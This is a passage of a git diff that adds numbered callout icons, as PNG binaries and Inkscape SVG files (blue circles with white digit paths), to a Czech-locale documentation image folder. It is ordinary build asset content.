+       style="font-size:17px;font-weight:bold;fill:#ffffff;-inkscape-font-specification:Bitstream Vera Sans Bold" />
+  </g>
+</svg>
diff --git a/tmp/cs-CZ/xml/Common_Content/images/16.png b/tmp/cs-CZ/xml/Common_Content/images/16.png
new file mode 100644
index 000000000..ff396af2f
Binary files /dev/null and b/tmp/cs-CZ/xml/Common_Content/images/16.png differ
diff --git a/tmp/cs-CZ/xml/Common_Content/images/16.svg b/tmp/cs-CZ/xml/Common_Content/images/16.svg
new file mode 100644
index 000000000..24d1eea04
--- /dev/null
+++ b/tmp/cs-CZ/xml/Common_Content/images/16.svg
@@ -0,0 +1,31 @@
+<?xml version="1.0" encoding="UTF-8" standalone="no"?>
+<!-- Created with Inkscape (http://www.inkscape.org/) -->
+
+<svg
+   xmlns:svg="http://www.w3.org/2000/svg"
+   xmlns="http://www.w3.org/2000/svg"
+   version="1.0"
+   width="32"
+   height="32"
+   id="svg2">
+  <defs
+     id="defs15" />
+  <circle
+     cx="16"
+     cy="16"
+     r="14"
+     id="circle"
+     style="fill:#336699" />
+  <g
+     id="text2820"
+     style="font-size:10px;font-style:normal;font-variant:normal;font-weight:normal;font-stretch:normal;text-align:center;text-anchor:middle;fill:#ffffff;fill-opacity:1;stroke:none;font-family:Droid Sans;-inkscape-font-specification:Droid Sans">
+    <path
+       d="m 13.215925,22.008438 -2.564941,0 0,-7.022461 c -4e-6,-0.143873 -4e-6,-0.315422 0,-0.514648 0.0055,-0.204745 0.01106,-0.415031 0.0166,-0.63086 0.01106,-0.221345 0.01936,-0.442699 0.0249,-0.664062 0.01106,-0.221345 0.01936,-0.423331 0.0249,-0.605957 -0.02767,0.03321 -0.07471,0.08302 -0.141113,0.149414 -0.06641,0.06642 -0.141118,0.141122 -0.224121,0.224121 -0.08301,0.07748 -0.168787,0.157724 -0.257325,0.240723 -0.08854,0.08302 -0.1743194,0.157723 -0.2573238,0.224121 L 8.442976,14.529434 7.1978588,12.985489 11.107527,9.8726959 l 2.108398,0 0,12.1357421"
+       id="path2818"
+       style="font-size:17px;font-weight:bold;fill:#ffffff;-inkscape-font-specification:Bitstream Vera Sans Bold" />
+    <path
+       d="m 16.428328,16.853653 c -1e-6,-0.581049 0.03044,-1.159336 0.09131,-1.734863 0.06641,-0.575514 0.17985,-1.126132 0.340332,-1.651856 0.166015,-0.531241 0.387369,-1.023753 0.664063,-1.477539 0.282224,-0.453765 0.636391,-0.846669 1.0625,-1.178711 0.431637,-0.337553 0.946285,-0.600411 1.543945,-0.788574 0.603185,-0.1936727 1.305984,-0.2905151 2.108398,-0.2905274 0.116205,1.23e-5 0.243483,0.00278 0.381836,0.0083 0.13834,0.00555 0.276686,0.013847 0.415039,0.024902 0.143873,0.00555 0.282219,0.016614 0.415039,0.033203 0.132805,0.016614 0.251783,0.035982 0.356934,0.058105 l 0,2.0502924 c -0.210294,-0.04979 -0.434415,-0.08853 -0.672363,-0.116211 -0.232429,-0.03319 -0.467618,-0.04979 -0.705567,-0.0498 -0.747076,1e-5 -1.361333,0.09408 -1.842773,0.282226 -0.48145,0.182627 -0.863285,0.439951 -1.145508,0.771973 -0.28223,0.33204 -0.484215,0.730477 -0.605957,1.195312 -0.116214,0.464852 -0.188154,0.9795 -0.21582,1.543946 l 0.09961,0 c 0.110674,-0.199212 0.243487,-0.384596 0.398438,-0.556153 0.160478,-0.177076 0.345862,-0.32649 0.556152,-0.448242 0.210282,-0.127271 0.445471,-0.22688 0.705566,-0.298828 0.265621,-0.07193 0.561681,-0.107902 0.888184,-0.10791 0.52571,8e-6 0.998854,0.08578 1.419434,0.257324 0.420565,0.171557 0.774732,0.42058 1.0625,0.74707 0.293286,0.326504 0.517407,0.727708 0.672363,1.203614 0.154939,0.475916 0.232413,1.021 0.232422,1.635254 -9e-6,0.658532 -0.09408,1.247887 -0.282227,1.768066 -0.182625,0.520184 -0.445483,0.962892 -0.788574,1.328125 -0.343106,0.359701 -0.758145,0.636394 -1.245117,0.830078 -0.486985,0.188151 -1.034836,0.282227 -1.643555,0.282227 -0.59766,0 -1.156579,-0.105144 -1.676758,-0.31543 -0.520185,-0.21582 -0.97396,-0.542317 -1.361328,-0.979492 -0.381837,-0.437173 -0.683432,-0.987791 -0.904785,-1.651856 -0.215821,-0.669593 -0.323731,-1.460933 -0.32373,-2.374023 m 4.216796,3.270508 c 0.226883,2e-6 0.431636,-0.0415 0.614258,-0.124512 0.188146,-0.08854 0.348627,-0.218585 0.481446,-0.390137 0.13834,-0.17708 0.243483,-0.398434 0.315429,-0.664062 0.07747,-0.265622 0.116205,-0.581051 0.116211,-0.946289 -6e-6,-0.592118 -0.124518,-1.056961 -0.373535,-1.394531 -0.243495,-0.343094 -0.61703,-0.514643 -1.120605,-0.514649 -0.254562,6e-6 -0.486984,0.04981 -0.697266,0.149414 -0.21029,0.09962 -0.390141,0.229661 -0.539551,0.390137 -0.149417,0.160487 -0.265628,0.340337 -0.348633,0.539551 -0.07748,0.199223 -0.116214,0.401209 -0.116211,0.605957 -3e-6,0.28223 0.0332,0.564456 0.09961,0.846679 0.07194,0.276696 0.17708,0.528486 0.315429,0.755371 0.143877,0.221357 0.318193,0.401207 0.52295,0.539551 0.210282,0.138349 0.453771,0.207522 0.730468,0.20752"
+       id="path2820"
+       style="font-size:17px;font-weight:bold;fill:#ffffff;-inkscape-font-specification:Bitstream Vera Sans Bold" />
+  </g>
+</svg>
diff --git a/tmp/cs-CZ/xml/Common_Content/images/17.png b/tmp/cs-CZ/xml/Common_Content/images/17.png
new file mode 100644
index 000000000..f1ba68a7f
Binary files /dev/null and b/tmp/cs-CZ/xml/Common_Content/images/17.png differ
diff --git a/tmp/cs-CZ/xml/Common_Content/images/17.svg b/tmp/cs-CZ/xml/Common_Content/images/17.svg
new file mode 100644
index 000000000..7796bd1d7
--- /dev/null
+++ b/tmp/cs-CZ/xml/Common_Content/images/17.svg
@@ -0,0 +1,31 @@
+<?xml version="1.0" encoding="UTF-8" standalone="no"?>
+<!-- Created with Inkscape (http://www.inkscape.org/) -->
+
+<svg
+   xmlns:svg="http://www.w3.org/2000/svg"
+   xmlns="http://www.w3.org/2000/svg"
+   version="1.0"
+   width="32"
+   height="32"
+   id="svg2">
+  <defs
+     id="defs15" />
+  <circle
+     cx="16"
+     cy="16"
+     r="14"
+     id="circle"
+     style="fill:#336699" />
+  <g
+     id="text2820"
+     style="font-size:10px;font-style:normal;font-variant:normal;font-weight:normal;font-stretch:normal;text-align:center;text-anchor:middle;fill:#ffffff;fill-opacity:1;stroke:none;font-family:Droid Sans;-inkscape-font-specification:Droid Sans">
+    <path
+       d="m 13.215925,22.008438 -2.564941,0 0,-7.022461 c -4e-6,-0.143873 -4e-6,-0.315422 0,-0.514648 0.0055,-0.204745 0.01106,-0.415031 0.0166,-0.63086 0.01106,-0.221345 0.01936,-0.442699 0.0249,-0.664062 0.01106,-0.221345 0.01936,-0.423331 0.0249,-0.605957 -0.02767,0.03321 -0.07471,0.08302 -0.141113,0.149414 -0.06641,0.06642 -0.141118,0.141122 -0.224121,0.224121 -0.08301,0.07748 -0.168787,0.157724 -0.257325,0.240723 -0.08854,0.08302 -0.1743194,0.157723 -0.2573238,0.224121 L 8.442976,14.529434 7.1978588,12.985489 11.107527,9.8726959 l 2.108398,0 0,12.1357421"
+       id="path2818"
+       style="font-size:17px;font-weight:bold;fill:#ffffff;-inkscape-font-specification:Bitstream Vera Sans Bold" />
+    <path
+       d="m 17.51573,22.008438 4.316406,-9.960937 -5.578125,0 0,-2.1582035 8.367188,0 0,1.6103515 -4.424317,10.508789 -2.681152,0"
+       id="path2820"
+       style="font-size:17px;font-weight:bold;fill:#ffffff;-inkscape-font-specification:Bitstream Vera Sans Bold" />
+  </g>
+</svg>
diff --git a/tmp/cs-CZ/xml/Common_Content/images/18.png b/tmp/cs-CZ/xml/Common_Content/images/18.png
new file mode 100644
index 000000000..df920d025
Binary files /dev/null and b/tmp/cs-CZ/xml/Common_Content/images/18.png differ
diff --git a/tmp/cs-CZ/xml/Common_Content/images/18.svg b/tmp/cs-CZ/xml/Common_Content/images/18.svg
new file mode 100644
index 000000000..356f207ee
--- /dev/null
+++ b/tmp/cs-CZ/xml/Common_Content/images/18.svg
@@ -0,0 +1,31 @@
+<?xml version="1.0" encoding="UTF-8" standalone="no"?>
+<!-- Created with Inkscape (http://www.inkscape.org/) -->
+
+<svg
+   xmlns:svg="http://www.w3.org/2000/svg"
+   xmlns="http://www.w3.org/2000/svg"
+   version="1.0"
+   width="32"
+   height="32"
+   id="svg2">
+  <defs
+     id="defs15" />
+  <circle
+     cx="16"
+     cy="16"
+     r="14"
+     id="circle"
+     style="fill:#336699" />
+  <g
+     id="text2820"
+     style="font-size:10px;font-style:normal;font-variant:normal;font-weight:normal;font-stretch:normal;text-align:center;text-anchor:middle;fill:#ffffff;fill-opacity:1;stroke:none;font-family:Droid Sans;-inkscape-font-specification:Droid Sans">
+    <path
+       d="m 13.215925,22.008438 -2.564941,0 0,-7.022461 c -4e-6,-0.143873 -4e-6,-0.315422 0,-0.514648 0.0055,-0.204745 0.01106,-0.415031 0.0166,-0.63086 0.01106,-0.221345 0.01936,-0.442699 0.0249,-0.664062 0.01106,-0.221345 0.01936,-0.423331 0.0249,-0.605957 -0.02767,0.03321 -0.07471,0.08302 -0.141113,0.149414 -0.06641,0.06642 -0.141118,0.141122 -0.224121,0.224121 -0.08301,0.07748 -0.168787,0.157724 -0.257325,0.240723 -0.08854,0.08302 -0.1743194,0.157723 -0.2573238,0.224121 L 8.442976,14.529434 7.1978588,12.985489 11.107527,9.8726959 l 2.108398,0 0,12.1357421"
+       id="path2818"
+       style="font-size:17px;font-weight:bold;fill:#ffffff;-inkscape-font-specification:Bitstream Vera Sans Bold" />
+    <path
+       d="m 20.48741,9.7149811 c 0.503575,1.23e-5 0.979486,0.060885 1.427734,0.1826172 0.448236,0.1217567 0.841139,0.3043737 1.178711,0.5478517 0.337557,0.243501 0.605949,0.547862 0.805176,0.913086 0.19921,0.365244 0.298819,0.794118 0.298828,1.286621 -9e-6,0.365243 -0.05535,0.697274 -0.166016,0.996094 -0.110685,0.293302 -0.262866,0.561694 -0.456543,0.805175 -0.193692,0.237963 -0.423347,0.451017 -0.688965,0.639161 -0.265631,0.188157 -0.553392,0.359707 -0.863281,0.514648 0.320957,0.171556 0.63362,0.362473 0.937988,0.572754 0.309889,0.210292 0.583814,0.448247 0.821778,0.713867 0.237947,0.260096 0.428865,0.55339 0.572754,0.879883 0.143871,0.326501 0.215811,0.691735 0.21582,1.095703 -9e-6,0.503583 -0.09962,0.960126 -0.298828,1.369629 -0.199227,0.409506 -0.478687,0.758139 -0.838379,1.045898 -0.359708,0.287761 -0.791348,0.509115 -1.294922,0.664063 -0.498053,0.154948 -1.048671,0.232422 -1.651855,0.232422 -0.652999,0 -1.234053,-0.07471 -1.743164,-0.224121 -0.509117,-0.149414 -0.937991,-0.362467 -1.286622,-0.639161 -0.348634,-0.276691 -0.614258,-0.617023 -0.796875,-1.020996 -0.177084,-0.403969 -0.265625,-0.857744 -0.265625,-1.361328 0,-0.415035 0.06087,-0.78857 0.182618,-1.120605 0.121744,-0.332027 0.287759,-0.630855 0.498046,-0.896485 0.210285,-0.265619 0.456542,-0.500808 0.73877,-0.705566 0.282224,-0.204747 0.583819,-0.384597 0.904785,-0.539551 -0.271161,-0.171543 -0.525718,-0.356927 -0.763672,-0.556152 -0.237957,-0.204746 -0.445477,-0.428866 -0.622558,-0.672363 -0.171551,-0.249016 -0.309897,-0.522942 -0.415039,-0.821778 -0.09961,-0.298819 -0.149415,-0.628083 -0.149414,-0.987793 -1e-6,-0.481435 0.09961,-0.902008 0.298828,-1.261718 0.204751,-0.365224 0.478676,-0.669585 0.821777,-0.913086 0.343097,-0.249012 0.738767,-0.434396 1.187012,-0.5561527 0.448238,-0.1217326 0.918615,-0.1826049 1.411133,-0.1826172 m -1.718262,9.0644529 c -3e-6,0.221357 0.03597,0.42611 0.10791,0.614258 0.07194,0.18262 0.17708,0.340334 0.31543,0.473145 0.143876,0.132814 0.32096,0.237957 0.53125,0.315429 0.210282,0.07194 0.453771,0.107912 0.730468,0.10791 0.58105,2e-6 1.015457,-0.135577 1.303223,-0.406738 0.287754,-0.27669 0.431634,-0.639157 0.431641,-1.087402 -7e-6,-0.232419 -0.04981,-0.439938 -0.149414,-0.622559 -0.09408,-0.188147 -0.218594,-0.359696 -0.373535,-0.514648 -0.14942,-0.160478 -0.32097,-0.307125 -0.514649,-0.439942 -0.19369,-0.132807 -0.387375,-0.260086 -0.581055,-0.381836 L 20.3878,16.72084 c -0.243494,0.12175 -0.464848,0.254563 -0.664062,0.398438 -0.199223,0.138351 -0.370772,0.293299 -0.514649,0.464844 -0.138349,0.16602 -0.246259,0.348637 -0.32373,0.547851 -0.07748,0.199223 -0.116214,0.415043 -0.116211,0.647461 m 1.70166,-7.188476 c -0.182622,10e-6 -0.354171,0.02768 -0.514648,0.08301 -0.154952,0.05535 -0.290532,0.13559 -0.406739,0.240723 -0.11068,0.105153 -0.199222,0.235199 -0.265625,0.390137 -0.06641,0.154957 -0.09961,0.329274 -0.09961,0.522949 -3e-6,0.232431 0.0332,0.434416 0.09961,0.605957 0.07194,0.166024 0.166012,0.315438 0.282227,0.448242 0.121741,0.127287 0.260087,0.243498 0.415039,0.348633 0.160477,0.09962 0.32926,0.199226 0.506348,0.298828 0.171544,-0.08853 0.334793,-0.185376 0.489746,-0.290527 0.154942,-0.105135 0.290522,-0.224113 0.406738,-0.356934 0.121739,-0.138338 0.218581,-0.293286 0.290527,-0.464843 0.07193,-0.171541 0.107904,-0.367993 0.10791,-0.589356 -6e-6,-0.193675 -0.03321,-0.367992 -0.09961,-0.522949 -0.06641,-0.154938 -0.15772,-0.284984 -0.273926,-0.390137 -0.116216,-0.105133 -0.254562,-0.185374 -0.415039,-0.240723 -0.160487,-0.05533 -0.334803,-0.083 -0.522949,-0.08301"
+       id="path2820"
+       style="font-size:17px;font-weight:bold;fill:#ffffff;-inkscape-font-specification:Bitstream Vera Sans Bold" />
+  </g>
+</svg>
diff --git a/tmp/cs-CZ/xml/Common_Content/images/19.png b/tmp/cs-CZ/xml/Common_Content/images/19.png
new file mode 100644
index 000000000..bda9a8c55
Binary files /dev/null and b/tmp/cs-CZ/xml/Common_Content/images/19.png differ
diff --git a/tmp/cs-CZ/xml/Common_Content/images/19.svg b/tmp/cs-CZ/xml/Common_Content/images/19.svg
new file mode 100644
index 000000000..385378074
--- /dev/null
+++ b/tmp/cs-CZ/xml/Common_Content/images/19.svg
@@ -0,0 +1,31 @@
+<?xml version="1.0" encoding="UTF-8" standalone="no"?>
+<!-- Created with Inkscape (http://www.inkscape.org/) -->
+
+<svg
+   xmlns:svg="http://www.w3.org/2000/svg"
+   xmlns="http://www.w3.org/2000/svg"
+   version="1.0"
+   width="32"
+   height="32"
+   id="svg2">
+  <defs
+     id="defs15" />
+  <circle
+     cx="16"
+     cy="16"
+     r="14"
+     id="circle"
+     style="fill:#336699" />
+  <g
+     id="text2820"
+     style="font-size:10px;font-style:normal;font-variant:normal;font-weight:normal;font-stretch:normal;text-align:center;text-anchor:middle;fill:#ffffff;fill-opacity:1;stroke:none;font-family:Droid Sans;-inkscape-font-specification:Droid Sans">
+    <path
+       d="m 13.215925,22.008438 -2.564941,0 0,-7.022461 c -4e-6,-0.143873 -4e-6,-0.315422 0,-0.514648 0.0055,-0.204745 0.01106,-0.415031 0.0166,-0.63086 0.01106,-0.221345 0.01936,-0.442699 0.0249,-0.664062 0.01106,-0.221345 0.01936,-0.423331 0.0249,-0.605957 -0.02767,0.03321 -0.07471,0.08302 -0.141113,0.149414 -0.06641,0.06642 -0.141118,0.141122 -0.224121,0.224121 -0.08301,0.07748 -0.168787,0.157724 -0.257325,0.240723 -0.08854,0.08302 -0.1743194,0.157723 -0.2573238,0.224121 L 8.442976,14.529434 7.1978588,12.985489 11.107527,9.8726959 l 2.108398,0 0,12.1357421"
+       id="path2818"
+       style="font-size:17px;font-weight:bold;fill:#ffffff;-inkscape-font-specification:Bitstream Vera Sans Bold" />
+    <path
+       d="m 24.554792,15.052383 c -8e-6,0.581061 -0.03321,1.162116 -0.09961,1.743164 -0.06088,0.575526 -0.174325,1.126144 -0.340332,1.651856 -0.16049,0.525719 -0.381844,1.018232 -0.664063,1.477539 -0.2767,0.453778 -0.630866,0.846681 -1.0625,1.178711 -0.426112,0.332032 -0.94076,0.59489 -1.543945,0.788574 -0.597661,0.188151 -1.300459,0.282227 -2.108398,0.282227 -0.116214,0 -0.243493,-0.0028 -0.381836,-0.0083 -0.138349,-0.0055 -0.279462,-0.01384 -0.42334,-0.0249 -0.138348,-0.0055 -0.273928,-0.0166 -0.406738,-0.0332 -0.132814,-0.01107 -0.249025,-0.02767 -0.348633,-0.0498 l 0,-2.058594 c 0.204751,0.05534 0.423338,0.09961 0.655762,0.132813 0.237953,0.02767 0.478675,0.04151 0.722168,0.0415 0.747066,2e-6 1.361324,-0.09131 1.842773,-0.273925 0.48144,-0.188149 0.863276,-0.44824 1.145508,-0.780274 0.28222,-0.337562 0.481439,-0.738766 0.597656,-1.203613 0.121738,-0.464839 0.196445,-0.97672 0.224121,-1.535645 l -0.10791,0 c -0.110683,0.199225 -0.243496,0.384609 -0.398438,0.556153 -0.154953,0.171554 -0.33757,0.320968 -0.547851,0.448242 -0.210292,0.127283 -0.448247,0.226892 -0.713867,0.298828 -0.26563,0.07194 -0.561691,0.107914 -0.888184,0.10791 -0.525719,4e-6 -0.998863,-0.08577 -1.419433,-0.257324 -0.420575,-0.171545 -0.777509,-0.420568 -1.070801,-0.74707 -0.287762,-0.326492 -0.509116,-0.727696 -0.664063,-1.203614 -0.154948,-0.475904 -0.232422,-1.020988 -0.232422,-1.635253 0,-0.65852 0.09131,-1.247875 0.273926,-1.768067 0.18815,-0.520172 0.453775,-0.960113 0.796875,-1.319824 0.343097,-0.365223 0.758136,-0.644682 1.245117,-0.838379 0.49251,-0.1936727 1.043128,-0.2905151 1.651856,-0.2905274 0.597651,1.23e-5 1.15657,0.1079224 1.676758,0.3237304 0.520175,0.210298 0.971184,0.534028 1.353027,0.971192 0.381828,0.437185 0.683423,0.990569 0.904785,1.660156 0.221346,0.669605 0.332023,1.458178 0.332031,2.365722 m -4.216796,-3.262207 c -0.226893,1.1e-5 -0.434412,0.04151 -0.622559,0.124512 -0.188155,0.08302 -0.351403,0.213063 -0.489746,0.390137 -0.132816,0.171559 -0.237959,0.392913 -0.31543,0.664062 -0.07194,0.265634 -0.107913,0.581063 -0.10791,0.946289 -3e-6,0.586596 0.124509,1.05144 0.373535,1.394532 0.24902,0.343105 0.625322,0.514654 1.128906,0.514648 0.254553,6e-6 0.486975,-0.0498 0.697266,-0.149414 0.210281,-0.0996 0.390131,-0.229648 0.539551,-0.390137 0.149408,-0.160475 0.262852,-0.340325 0.340332,-0.53955 0.083,-0.199212 0.124505,-0.401197 0.124512,-0.605958 -7e-6,-0.282218 -0.03598,-0.561677 -0.107911,-0.838378 -0.06641,-0.282218 -0.171555,-0.534008 -0.315429,-0.755372 -0.138352,-0.226878 -0.312669,-0.409495 -0.52295,-0.547851 -0.204757,-0.138336 -0.44548,-0.207509 -0.722167,-0.20752"
+       id="path2820"
+       style="font-size:17px;font-weight:bold;fill:#ffffff;-inkscape-font-specification:Bitstream Vera Sans Bold" />
+  </g>
+</svg>
diff --git a/tmp/cs-CZ/xml/Common_Content/images/2.png b/tmp/cs-CZ/xml/Common_Content/images/2.png
new file mode 100644
index 000000000..b95445a4e
Binary files /dev/null and b/tmp/cs-CZ/xml/Common_Content/images/2.png differ
diff --git a/tmp/cs-CZ/xml/Common_Content/images/2.svg b/tmp/cs-CZ/xml/Common_Content/images/2.svg
new file mode 100644
index 000000000..236a8dacb
--- /dev/null
+++ b/tmp/cs-CZ/xml/Common_Content/images/2.svg
@@ -0,0 +1,27 @@
+<?xml version="1.0" encoding="UTF-8" standalone="no"?>
+<!-- Created with Inkscape (http://www.inkscape.org/) -->
+
+<svg
+   xmlns:svg="http://www.w3.org/2000/svg"
+   xmlns="http://www.w3.org/2000/svg"
+   version="1.0"
+   width="32"
+   height="32"
+   id="svg2">
+  <defs
+     id="defs15" />
+  <circle
+     cx="16"
+     cy="16"
+     r="14"
+     id="circle"
+     style="fill:#336699" />
+  <g
+     id="text2820"
+     style="font-size:10px;font-style:normal;font-variant:normal;font-weight:normal;font-stretch:normal;fill:#ffffff;fill-opacity:1;stroke:none;font-family:Droid Sans;-inkscape-font-specification:Droid Sans">
+    <path
+       d="m 19.89546,22.008438 -8.143066,0 0,-1.784668 2.855468,-3.07959 c 0.359697,-0.387364 0.686194,-0.744297 0.979493,-1.0708 0.293289,-0.326492 0.545079,-0.644688 0.755371,-0.95459 0.210281,-0.309889 0.373529,-0.625318 0.489746,-0.946289 0.116205,-0.320956 0.17431,-0.666821 0.174316,-1.037598 -6e-6,-0.409496 -0.124517,-0.727692 -0.373535,-0.95459 -0.243495,-0.226878 -0.572759,-0.340322 -0.987793,-0.340332 -0.437178,10e-6 -0.857751,0.10792 -1.261719,0.323731 -0.403974,0.215829 -0.827313,0.522958 -1.270019,0.921386 l -1.394531,-1.651855 c 0.249022,-0.226877 0.509113,-0.442698 0.780273,-0.647461 0.271157,-0.210275 0.569985,-0.395659 0.896484,-0.556152 0.326495,-0.16047 0.686195,-0.2877488 1.079102,-0.3818364 0.3929,-0.099597 0.832841,-0.1494018 1.319824,-0.1494141 0.58105,1.23e-5 1.101231,0.080253 1.560547,0.2407227 0.464837,0.1604938 0.860507,0.3901488 1.187012,0.6889648 0.326489,0.293305 0.575513,0.650239 0.74707,1.070801 0.177075,0.420583 0.265617,0.893727 0.265625,1.419433 -8e-6,0.47592 -0.08302,0.932463 -0.249023,1.369629 -0.166024,0.431648 -0.392912,0.857754 -0.680664,1.278321 -0.287768,0.415044 -0.622566,0.830083 -1.004395,1.245117 -0.376308,0.40951 -0.780279,0.827315 -1.211914,1.253418 l -1.460937,1.469238 0,0.116211 4.947265,0 0,2.158203"
+       id="path2818"
+       style="font-size:17px;font-weight:bold;fill:#ffffff;-inkscape-font-specification:Bitstream Vera Sans Bold" />
+  </g>
+</svg>
diff --git a/tmp/cs-CZ/xml/Common_Content/images/20.png b/tmp/cs-CZ/xml/Common_Content/images/20.png
new file mode 100644
index 000000000..c30191a36
Binary files /dev/null and b/tmp/cs-CZ/xml/Common_Content/images/20.png differ
diff --git a/tmp/cs-CZ/xml/Common_Content/images/20.svg b/tmp/cs-CZ/xml/Common_Content/images/20.svg
new file mode 100644
index 000000000..d41206eec
--- /dev/null
+++ b/tmp/cs-CZ/xml/Common_Content/images/20.svg
@@ -0,0 +1,31 @@
+<?xml version="1.0" encoding="UTF-8" standalone="no"?>
+<!-- Created with Inkscape (http://www.inkscape.org/) -->
+
+<svg
+   xmlns:svg="http://www.w3.org/2000/svg"
+   xmlns="http://www.w3.org/2000/svg"
+   version="1.0"
+   width="32"
+   height="32"
+   id="svg2">
+  <defs
+     id="defs15" />
+  <circle
+     cx="16"
+     cy="16"
+     r="14"
+     id="circle"
+     style="fill:#336699" />
+  <g
+     id="text2820"
+     style="font-size:10px;font-style:normal;font-variant:normal;font-weight:normal;font-stretch:normal;text-align:center;text-anchor:middle;fill:#ffffff;fill-opacity:1;stroke:none;font-family:Droid Sans;-inkscape-font-specification:Droid Sans">
+    <path
+       d="m 15.257917,22.008438 -8.143066,0 0,-1.784668 2.8554687,-3.07959 c 0.3596963,-0.387364 0.6861933,-0.744297 0.9794923,-1.0708 0.293289,-0.326492 0.54508,-0.644688 0.755371,-0.95459 0.210281,-0.309889 0.37353,-0.625318 0.489746,-0.946289 0.116205,-0.320956 0.174311,-0.666821 0.174317,-1.037598 -6e-6,-0.409496 -0.124518,-0.727692 -0.373536,-0.95459 -0.243495,-0.226878 -0.572759,-0.340322 -0.987793,-0.340332 -0.437178,10e-6 -0.857751,0.10792 -1.2617183,0.323731 C 9.3422244,12.379541 8.918885,12.68667 8.4761791,13.085098 L 7.0816479,11.433243 C 7.3306704,11.206366 7.5907613,10.990545 7.8619213,10.785782 8.1330785,10.575507 8.4319063,10.390123 8.7584057,10.22963 9.0849004,10.06916 9.4446006,9.9418812 9.8375072,9.8477936 10.230407,9.7481965 10.670348,9.6983918 11.157331,9.6983795 c 0.58105,1.23e-5 1.101232,0.080253 1.560547,0.2407227 0.464837,0.1604938 0.860508,0.3901488 1.187012,0.6889648 0.32649,0.293305 0.575513,0.650239 0.74707,1.070801 0.177075,0.420583 0.265617,0.893727 0.265625,1.419433 -8e-6,0.47592 -0.08302,0.932463 -0.249023,1.369629 -0.166024,0.431648 -0.392912,0.857754 -0.680664,1.278321 -0.287768,0.415044 -0.622566,0.830083 -1.004395,1.245117 -0.376308,0.40951 -0.780279,0.827315 -1.211914,1.253418 l -1.460937,1.469238 0,0.116211 4.947265,0 0,2.158203"
+       id="path2818"
+       style="font-size:17px;font-weight:bold;fill:#ffffff;-inkscape-font-specification:Bitstream Vera Sans Bold" />
+    <path
+       d="m 24.6378,15.940567 c -9e-6,0.979497 -0.07748,1.853845 -0.232422,2.623047 -0.149422,0.769208 -0.392912,1.422202 -0.730468,1.958984 -0.332039,0.536785 -0.763679,0.94629 -1.294922,1.228516 -0.525722,0.282226 -1.162115,0.42334 -1.90918,0.42334 -0.702803,0 -1.314294,-0.141114 -1.834473,-0.42334 -0.520184,-0.282226 -0.951824,-0.691731 -1.294922,-1.228516 -0.3431,-0.536782 -0.600424,-1.189776 -0.771972,-1.958984 -0.166016,-0.769202 -0.249024,-1.64355 -0.249024,-2.623047 0,-0.979485 0.07471,-1.8566 0.224121,-2.631348 0.154948,-0.77473 0.398437,-1.430491 0.730469,-1.967285 0.33203,-0.536772 0.760903,-0.946277 1.286621,-1.228515 0.525713,-0.2877487 1.162106,-0.4316287 1.90918,-0.431641 0.69726,1.23e-5 1.305984,0.1411254 1.826172,0.42334 0.520175,0.282238 0.954582,0.691743 1.303223,1.228515 0.348624,0.536794 0.608715,1.192555 0.780273,1.967286 0.171541,0.774747 0.257315,1.654629 0.257324,2.639648 m -5.760742,0 c -3e-6,1.383468 0.118975,2.423832 0.356934,3.121094 0.237952,0.697268 0.650223,1.0459 1.236816,1.045898 0.575516,2e-6 0.987787,-0.345863 1.236816,-1.037597 0.254552,-0.691729 0.38183,-1.734859 0.381836,-3.129395 -6e-6,-1.38899 -0.127284,-2.43212 -0.381836,-3.129395 -0.249029,-0.702789 -0.6613,-1.054188 -1.236816,-1.054199 -0.293299,1.1e-5 -0.542322,0.08855 -0.74707,0.265625 -0.199223,0.177093 -0.362471,0.439951 -0.489746,0.788574 -0.127282,0.348642 -0.218591,0.785816 -0.273926,1.311524 -0.05534,0.52019 -0.08301,1.126146 -0.08301,1.817871"
+       id="path2820"
+       style="font-size:17px;font-weight:bold;fill:#ffffff;-inkscape-font-specification:Bitstream Vera Sans Bold" />
+  </g>
+</svg>
diff --git a/tmp/cs-CZ/xml/Common_Content/images/21.png b/tmp/cs-CZ/xml/Common_Content/images/21.png
new file mode 100644
index 000000000..fa3aa907d
Binary files /dev/null and b/tmp/cs-CZ/xml/Common_Content/images/21.png differ
diff --git a/tmp/cs-CZ/xml/Common_Content/images/21.svg b/tmp/cs-CZ/xml/Common_Content/images/21.svg
new file mode 100644
index 000000000..b17f23a5a
--- /dev/null
+++ b/tmp/cs-CZ/xml/Common_Content/images/21.svg
@@ -0,0 +1,31 @@
+<?xml version="1.0" encoding="UTF-8" standalone="no"?>
+<!-- Created with Inkscape (http://www.inkscape.org/) -->
+
+<svg
+   xmlns:svg="http://www.w3.org/2000/svg"
+   xmlns="http://www.w3.org/2000/svg"
+   version="1.0"
+   width="32"
+   height="32"
+   id="svg2">
+  <defs
+     id="defs15" />
+  <circle
+     cx="16"
+     cy="16"
+     r="14"
+     id="circle"
+     style="fill:#336699" />
+  <g
+     id="text2820"
+     style="font-size:10px;font-style:normal;font-variant:normal;font-weight:normal;font-stretch:normal;text-align:center;text-anchor:middle;fill:#ffffff;fill-opacity:1;stroke:none;font-family:Droid Sans;-inkscape-font-specification:Droid Sans">
+    <path
+       d="m 15.257917,22.008438 -8.143066,0 0,-1.784668 2.8554687,-3.07959 c 0.3596963,-0.387364 0.6861933,-0.744297 0.9794923,-1.0708 0.293289,-0.326492 0.54508,-0.644688 0.755371,-0.95459 0.210281,-0.309889 0.37353,-0.625318 0.489746,-0.946289 0.116205,-0.320956 0.174311,-0.666821 0.174317,-1.037598 -6e-6,-0.409496 -0.124518,-0.727692 -0.373536,-0.95459 -0.243495,-0.226878 -0.572759,-0.340322 -0.987793,-0.340332 -0.437178,10e-6 -0.857751,0.10792 -1.2617183,0.323731 C 9.3422244,12.379541 8.918885,12.68667 8.4761791,13.085098 L 7.0816479,11.433243 C 7.3306704,11.206366 7.5907613,10.990545 7.8619213,10.785782 8.1330785,10.575507 8.4319063,10.390123 8.7584057,10.22963 9.0849004,10.06916 9.4446006,9.9418812 9.8375072,9.8477936 10.230407,9.7481965 10.670348,9.6983918 11.157331,9.6983795 c 0.58105,1.23e-5 1.101232,0.080253 1.560547,0.2407227 0.464837,0.1604938 0.860508,0.3901488 1.187012,0.6889648 0.32649,0.293305 0.575513,0.650239 0.74707,1.070801 0.177075,0.420583 0.265617,0.893727 0.265625,1.419433 -8e-6,0.47592 -0.08302,0.932463 -0.249023,1.369629 -0.166024,0.431648 -0.392912,0.857754 -0.680664,1.278321 -0.287768,0.415044 -0.622566,0.830083 -1.004395,1.245117 -0.376308,0.40951 -0.780279,0.827315 -1.211914,1.253418 l -1.460937,1.469238 0,0.116211 4.947265,0 0,2.158203"
+       id="path2818"
